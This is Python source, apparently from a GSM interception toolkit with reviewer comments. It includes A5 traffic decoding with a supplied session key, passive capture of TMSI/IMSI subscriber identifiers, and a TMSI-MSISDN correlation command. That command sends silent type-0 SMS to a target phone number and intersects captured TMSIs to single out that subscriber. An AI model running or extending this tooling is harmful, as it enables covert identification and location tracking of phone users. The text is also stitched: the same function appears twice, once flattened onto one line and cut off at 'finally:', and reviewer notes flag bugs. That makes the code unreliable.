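        # NOTE(review): gain is resolved but grgsm_decoder() below is not given
        # it (unchanged from the original) -- confirm whether the flowgraph accepts one.

        cfile = None
        burstfile = None
        if args.cfile is not None:
            cfile = self._data_access_provider.getfilepath(args.cfile)
        if args.bursts is not None:
            burstfile = self._data_access_provider.getfilepath(args.bursts)
        if cfile is None and burstfile is None:
            self.printmsg("You must provide either a cfile or a burst file as destination.")
            return

        # The original hard-coded enable_voice_boundary_detection=False although
        # --voice-boundary-detect is declared above; forward the parsed flag.
        tb = decoder.grgsm_decoder(timeslot=args.timeslot, subslot=args.subslot, chan_mode=args.mode,
                                   burst_file=burstfile, cfile=cfile, fc=freq,
                                   samp_rate=sample_rate, a5=args.a5, a5_kc=kc,
                                   speech_file=args.speech_output_file,
                                   speech_codec=self.tch_codecs.get(args.speech_codec),
                                   enable_voice_boundary_detection=args.enable_voice_boundary_detection,
                                   verbose=args.print_messages, print_bursts=args.print_bursts,
                                   ppm=ppm)
        tb.start()
        tb.wait()

    @staticmethod
    def _parse_kc(value):
        """Parse an A5 session key given as ``0x12,0x34,...`` (8 hex bytes) or 16 hex digits.

        Returns:
            list of 8 ints in 0..255, or None when *value* is malformed.  The
            original appended to a shared list and only rebound a local name on
            error, so a bad key was passed on as a partial list.
        """
        try:
            if ',' in value:
                parts = value.split(',')
            elif len(value) == 16:
                parts = [value[2 * i:2 * i + 2] for i in range(8)]
            else:
                return None
            key_bytes = [int(s, 16) for s in parts]
        except ValueError:
            return None
        if len(key_bytes) != 8 or any(b < 0 or b > 255 for b in key_bytes):
            return None
        return key_bytes

    @staticmethod
    def _resolve_channel(freq, arfcn_num, band):
        """Derive the missing half of the (frequency, ARFCN) pair.

        With a band the given value is validated and converted; without one
        the bands from ``arfcn.get_bands()`` are tried in order and the first
        match wins (if none matches, ``band`` is left at the last band tried,
        as in the original loop).  The numeric ARFCN is kept under its own name
        because the original assigned it to ``arfcn``, shadowing the ``arfcn``
        helper module and raising AttributeError on the first validity check.

        Returns:
            ``(freq, arfcn_num, band, error)`` where ``error`` is a message for
            the user when the value is not valid in the given band, else None.
        """
        if freq is not None:
            if band:
                if not arfcn.is_valid_downlink(freq, band):
                    return freq, arfcn_num, band, "Frequency is not valid in the specified band"
                arfcn_num = arfcn.downlink2arfcn(freq, band)
            else:
                for band in arfcn.get_bands():
                    if arfcn.is_valid_downlink(freq, band):
                        arfcn_num = arfcn.downlink2arfcn(freq, band)
                        break
        elif arfcn_num is not None:
            if band:
                if not arfcn.is_valid_arfcn(arfcn_num, band):
                    return freq, arfcn_num, band, "ARFCN is not valid in the specified band"
                freq = arfcn.arfcn2downlink(arfcn_num, band)
            else:
                for band in arfcn.get_bands():
                    if arfcn.is_valid_arfcn(arfcn_num, band):
                        freq = arfcn.arfcn2downlink(arfcn_num, band)
                        break
        return freq, arfcn_num, band, None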
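class TmsiPlugin(PluginBase):
    """Command plugin ``tmsi_capture``: count the TMSI / IMSI values seen on a CCCH and report them."""

    channel_modes = ['BCCH', 'BCCH_SDCCH4']
    # Scratch file in the current directory that tmsi_capture() parses and
    # removes; presumably written by the TmsiCapture flowgraph (defined elsewhere).
    TMSI_COUNT_FILE = "tmsicount.txt"

    @arg("-v", action="store_true", dest="verbose", help="If set, the captured TMSI / IMSI are printed.")
    @arg("-o", action="store", dest="dest_file", help="If set, the captured TMSI / IMSI are stored in the specified file.")
    @arg("-m", action="store", dest="mode", choices=channel_modes, help="Channel mode.", default="BCCH")
    @arg_group(name="Cfile Options", args=[
        arg("-a", action="store", dest="arfcn", type=int, help="ARFCN of the cfile capture."),
        arg("-f", action="store", dest="freq", type=float, help="Frequency of the cfile capture."),
        arg("-b", action="store", dest="band", choices=arfcn.get_bands(), help="GSM of the cfile capture."),
        arg("-p", action="store", dest="ppm", type=int, help="Set ppm. Default: value from config file."),
        arg("-s", action="store", dest="samp_rate", type=float, help="Set sample rate. Default: value from config file."),
        arg("-g", action="store", type=float, dest="gain", help="Set gain. Default: value from config file.")
    ])
    @arg("-t", action="store", dest="timeslot", type=int, help="Timeslot of the CCCH.", default=0)
    @arg_exclusive(args=[
        arg("--cfile", action="store_path", dest="cfile", help="cfile."),
        arg("--bursts", action="store_path", dest="bursts", help="bursts.")
    ])
    @cmd(name="tmsi_capture", description="TMSI capturing.")
    def tmsi_capture(self, args):
        """Run TmsiCapture over a cfile/burst file, then tally and report the identifiers it wrote.

        Each line of the scratch file is split on ``-``: a first field other
        than ``"0"`` is counted as a TMSI, otherwise the third field is counted
        as an IMSI.  Results go to ``self.printmsg`` (``-v``) and/or to
        ``args.dest_file`` (``-o``), most frequent first.

        Raises:
            PluginError: if neither ``args.cfile`` nor ``args.bursts`` is given.
        """
        if args.cfile is None and args.bursts is None:
            raise PluginError("Provide a cfile or burst file.")

        # The help text promises the config file as default for -p/-s; the
        # original passed None through when the options were omitted.
        ppm = args.ppm
        sample_rate = args.samp_rate
        if ppm is None:
            ppm = self._config_provider.getint("rtl_sdr", "ppm")
        if sample_rate is None:
            sample_rate = self._config_provider.getint("rtl_sdr", "sample_rate")
        # NOTE(review): -a/-b/-g are parsed but not used by this command
        # (unchanged from the original); only -f is forwarded as fc.

        destfile = None
        cfile = None
        burstfile = None
        if args.dest_file is not None:
            destfile = self._data_access_provider.getfilepath(args.dest_file)
        if args.cfile is not None:
            cfile = self._data_access_provider.getfilepath(args.cfile)
        if args.bursts is not None:
            burstfile = self._data_access_provider.getfilepath(args.bursts)

        flowgraph = TmsiCapture(timeslot=args.timeslot, chan_mode=args.mode, burst_file=burstfile,
                                cfile=cfile, fc=args.freq, samp_rate=sample_rate, ppm=ppm)
        flowgraph.start()
        flowgraph.wait()

        tmsis = collections.Counter()
        imsis = collections.Counter()
        try:
            with open(self.TMSI_COUNT_FILE) as count_file:
                for line in count_file:
                    line = line.strip()
                    if not line:
                        continue  # the original counted a blank line as TMSI ""
                    segments = line.split("-")
                    if segments[0] != "0":
                        tmsis[segments[0]] += 1
                    elif len(segments) > 2:  # the original raised IndexError on short lines
                        imsis[segments[2]] += 1
        finally:
            # The scratch file holds subscriber identifiers: remove it even when
            # parsing fails, and tolerate it already being gone.
            try:
                os.remove(self.TMSI_COUNT_FILE)
            except OSError:
                pass

        self.printmsg("Captured {} TMSI, {} IMSI\n".format(len(tmsis), len(imsis)))
        if not args.verbose and destfile is None:
            return

        # most_common() orders by descending count like the original sorted(...) call.
        ranked = tmsis.most_common() + imsis.most_common()
        if destfile is not None:
            # The report lists subscriber identifiers; create it owner-read/write only.
            fd = os.open(destfile, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
            with os.fdopen(fd, "w") as report:
                for key, count in ranked:
                    report.write("{}:{}\n".format(key, count))
        if args.verbose:
            for key, count in ranked:
                self.printmsg("{} ({} times)".format(key, count))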
def tmsi_correlation(self, args):
    """Command entry point for ``tmsi_correlation``.

    Runs up to ``args.max_sms`` iterations; in each one a TmsiLiveCapture
    flowgraph is started, one message is sent through GatAppSmsAdapter to
    ``args.msisdn``, responses are polled for a fixed 15 s window, and the
    TMSI set read by ``self.read_tmsi_file()`` is intersected with the
    previous iterations'.  Stops early when the intersection is empty or
    holds a single entry.  Python 2 syntax (``print`` statement,
    ``except Exception, e``).  All feedback goes through ``self.printmsg``
    except the two bare ``print`` statements kept from the original.
    """
    mode = args.mode
    freq = args.freq
    # NOTE(review): this rebinding shadows the ``arfcn`` helper module that the
    # validation below calls (``arfcn.is_valid_downlink`` etc.), so with -f/-a
    # given those calls are made on an int/None.  Kept as-is here.
    arfcn = args.arfcn
    band = args.band
    ppm = args.ppm
    sample_rate = args.samp_rate
    gain = args.gain
    timeslot = args.timeslot
    max_iterations = args.max_sms
    msisdn = args.msisdn
    wait = args.wait
    # RTL-SDR parameters: command line first, config file as default.
    if ppm is None:
        ppm = self._config_provider.getint("rtl_sdr", "ppm")
    if sample_rate is None:
        sample_rate = self._config_provider.getint("rtl_sdr", "sample_rate")
    if gain is None:
        gain = self._config_provider.getint("rtl_sdr", "gain")
    # Derive the missing half of the (frequency, ARFCN) pair, same pattern as
    # the other commands in this file.
    if freq is not None:
        if band:
            if not arfcn.is_valid_downlink(freq, band):
                self.printmsg("Frequency is not valid in the specified band")
                return
            else:
                arfcn = arfcn.downlink2arfcn(freq, band)
        else:
            for band in arfcn.get_bands():
                if arfcn.is_valid_downlink(freq, band):
                    arfcn = arfcn.downlink2arfcn(freq, band)
                    break
    elif arfcn is not None:
        if band:
            if not arfcn.is_valid_arfcn(arfcn, band):
                self.printmsg("ARFCN is not valid in the specified band")
                return
            else:
                freq = arfcn.arfcn2downlink(arfcn, band)
        else:
            for band in arfcn.get_bands():
                if arfcn.is_valid_arfcn(arfcn, band):
                    freq = arfcn.arfcn2downlink(arfcn, band)
                    break
    # todo: stop if max_iterations < 6
    # Adapter responses arrive on a callback and are handed over via this queue.
    response_queue = Queue.Queue()

    def callback(msg):
        response_queue.put(msg)

    # ``wait`` is given to the adapter only; the polling window below is a
    # hard-coded 15 seconds.
    adapter = GatAppSmsAdapter(self._config_provider, wait)
    adapter.register_read_callback(callback)
    candidates = set()
    i = 0
    try:
        while i < max_iterations:
            flowgraph = TmsiLiveCapture(timeslot=timeslot, chan_mode=mode, fc=freq, arfcn=arfcn,
                                        samp_rate=sample_rate, ppm=ppm, gain=gain)
            with Silencer():  # keep rtl_sdr's console output out of ours
                flowgraph.start()
            response_received = False
            adapter.send(sms_type=SmsType.MWID_Report, msisdn=msisdn, text=None)
            start = time.time()
            now = start
            while (now - start) < 15:
                if not response_queue.empty():
                    response = response_queue.get()
                    # self.printmsg("response: " + response)
                    if "Connection refused" in response.strip('\n'):
                        self.printmsg("Failed to connect to GAT app")
                        break
                    # parse_response() (defined elsewhere) yields (type, msisdn, status).
                    response_msg = self.parse_response(response)
                    response_type = response_msg[0]
                    response_msisdn = response_msg[1]
                    response_status = response_msg[2]
                    if response_type == "sms-status":
                        if response_status != "OK":
                            self.printmsg("Sending to %s failed" % response_msisdn)
                        else:
                            pass
                            # self.printmsg("SMS message to %s was sent." % response_msisdn)
                    elif response_type == "sms-rcv":
                        # recipient got our message
                        response_received = True
                        break
                    if response_type == "sms-send" and response_status != "OK":
                        self.printmsg("Sending to %s failed" % response_msisdn)
                    elif response_type == "sms-delivery":
                        if response_status != "OK":
                            self.printmsg("Delivery to %s failed." % response_msisdn)
                        else:
                            self.printmsg("Response from %s received." % response_msisdn)
                time.sleep(0.2)  # ToDo: No busy waiting !
                now = time.time()
            if not response_received:
                self.printmsg("Timeout: no response to the ping")
                # return
            flowgraph.wait()
            flowgraph.stop()
            flowgraph = None
            # Keep only TMSIs seen in every iteration so far.
            iteration_candidates = self.read_tmsi_file()
            if i == 0:
                candidates = candidates.union(iteration_candidates)
            else:
                candidates = candidates.intersection(iteration_candidates)
            print "candidates: " + str(len(candidates))
            if len(candidates) == 0:
                if i > 0:
                    self.printmsg("No intersection found.")
                    break
                else:
                    self.printmsg("No TMSIs captured.")
                    break
            elif len(candidates) == 1:
                result = candidates.pop()
                self.printmsg("Found TMSI: {}".format(result))
                break
            i += 1
    except Exception, e:
        # NOTE(review): any error ends the loop with a bare print of the
        # exception; there is no cleanup of a running flowgraph here.
        print e
class TmsiIdentificationPlugin(PluginBase): channel_modes = ['BCCH', 'BCCH_SDCCH4'] # anzahl der iterationen @arg("-n", action="store", dest="max_sms", type=int, help="Max number of type 0 SMS messages to send.", default=6) @arg('-w', '--wait-for-response', action="store", dest="wait", type=int, default=15, help="Wait n seconds for a response to a SMS ping.") @arg("-m", action="store", dest="mode", choices=channel_modes, help="Channel mode.", default="BCCH") @arg_group(name="RTL-SDR configuration", args=[ arg("-p", action="store", dest="ppm", type=int, help="Set ppm. Default: value from config file."), arg("-s", action="store", dest="samp_rate", type=float, help="Set sample rate. Default: value from config file."), arg("-g", action="store", type=float, dest="gain", help="Set gain. Default: value from config file.") ]) @arg_exclusive(args=[ arg("-a", action="store", dest="arfcn", type=int, help="ARFCN of the BTS."), arg("-f", action="store", dest="freq", type=float, help="Frequency of the BTS.") ]) @arg("-b", action="store", dest="band", choices=(arfcn.get_bands()), help="GSM band of the ARFCN.") @arg("-t", action="store", dest="timeslot", type=int, help="Timeslot of the CCCH.", default=0) @arg('msisdn', action="store", help="MSISDN to correlate (i.e. 
+43123456789).") @cmd(name="tmsi_correlation", description="Perform TMSI-MSISDN correlation.") def tmsi_correlation(self, args): mode = args.mode freq = args.freq arfcn = args.arfcn band = args.band ppm = args.ppm sample_rate = args.samp_rate gain = args.gain timeslot = args.timeslot max_iterations = args.max_sms msisdn = args.msisdn wait = args.wait if ppm is None: ppm = self._config_provider.getint("rtl_sdr", "ppm") if sample_rate is None: sample_rate = self._config_provider.getint("rtl_sdr", "sample_rate") if gain is None: gain = self._config_provider.getint("rtl_sdr", "gain") if freq is not None: if band: if not arfcn.is_valid_downlink(freq, band): self.printmsg("Frequency is not valid in the specified band") return else: arfcn = arfcn.downlink2arfcn(freq, band) else: for band in arfcn.get_bands(): if arfcn.is_valid_downlink(freq, band): arfcn = arfcn.downlink2arfcn(freq, band) break elif arfcn is not None: if band: if not arfcn.is_valid_arfcn(arfcn, band): self.printmsg("ARFCN is not valid in the specified band") return else: freq = arfcn.arfcn2downlink(arfcn, band) else: for band in arfcn.get_bands(): if arfcn.is_valid_arfcn(arfcn, band): freq = arfcn.arfcn2downlink(arfcn, band) break # todo: stop if max_iterations < 6 response_queue = Queue.Queue() def callback(msg): response_queue.put(msg) adapter = GatAppSmsAdapter(self._config_provider, wait) adapter.register_read_callback(callback) candidates = set() i = 0 try: while i < max_iterations: flowgraph = TmsiLiveCapture(timeslot=timeslot, chan_mode=mode, fc=freq, arfcn=arfcn, samp_rate=sample_rate, ppm=ppm, gain=gain) with Silencer(): flowgraph.start() response_received = False adapter.send(sms_type=SmsType.MWID_Report, msisdn=msisdn, text=None) start = time.time() now = start while (now - start) < 15: if not response_queue.empty(): response = response_queue.get() # self.printmsg("response: " + response) if "Connection refused" in response.strip('\n'): self.printmsg("Failed to connect to GAT app") break 
response_msg = self.parse_response(response) response_type = response_msg[0] response_msisdn = response_msg[1] response_status = response_msg[2] if response_type == "sms-status": if response_status != "OK": self.printmsg("Sending to %s failed" % response_msisdn) else: pass # self.printmsg("SMS message to %s was sent." % response_msisdn) elif response_type == "sms-rcv": # recipient got our message response_received = True break if response_type == "sms-send" and response_status != "OK": self.printmsg("Sending to %s failed" % response_msisdn) elif response_type == "sms-delivery": if response_status != "OK": self.printmsg("Delivery to %s failed." % response_msisdn) else: self.printmsg("Response from %s received." % response_msisdn) time.sleep(0.2) # ToDo: No busy waiting ! now = time.time() if not response_received: self.printmsg("Timeout: no response to the ping") # return flowgraph.wait() flowgraph.stop() flowgraph = None iteration_candidates = self.read_tmsi_file() if i == 0: candidates = candidates.union(iteration_candidates) else: candidates = candidates.intersection(iteration_candidates) print "candidates: " + str(len(candidates)) if len(candidates) == 0: if i > 0: self.printmsg("No intersection found.") break else: self.printmsg("No TMSIs captured.") break elif len(candidates) == 1: result = candidates.pop() self.printmsg("Found TMSI: {}".format(result)) break i += 1 except Exception, e: print e finally: